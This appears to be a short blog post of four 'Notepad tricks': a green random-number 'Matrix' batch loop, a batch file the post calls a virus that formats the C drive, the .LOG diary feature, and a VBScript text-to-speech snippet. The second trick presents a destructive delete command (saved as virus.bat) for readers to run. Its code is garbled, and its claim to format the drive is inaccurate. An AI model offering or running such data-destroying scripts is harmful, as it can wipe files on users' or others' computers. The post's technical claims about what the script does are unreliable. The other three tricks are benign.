TOP COOLEST NOTEPAD TRICKS:

1.MATRIX EFFECT:

In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.
1. Open Noteapad and copy below code into it.
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
2. Now save this file as Matrix.bat (name can be anything but .bat is must)
3. Open your saved file and you will have matrix effect on your screen
2.CREATING VIRUS THAT FORMAT C:DRIVE:

In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.
1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
2. Then Save this file as virus.bat
3. Now, running this file format C Drive.
3.MAKING PERSONAL DAIRY USING NOTEPAD:

Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.
1. Open Notepad and Type .LOG (in capital Letters and press enter
2. Save the program with any name and close it.
3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad
4.TO COVERT WRITTEN TEXT INTO VOICE
here i can show u how notepad tell the text what u have written.so that notepad speech out the text which is written inside notepad
1.open 'notepad' and copy the below code
2.Dim message, sapi
message=InputBox("What do you want me to say?","gamesdoodle")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message
3.save the above code in notepad as '.vbs'
No comments:
Post a Comment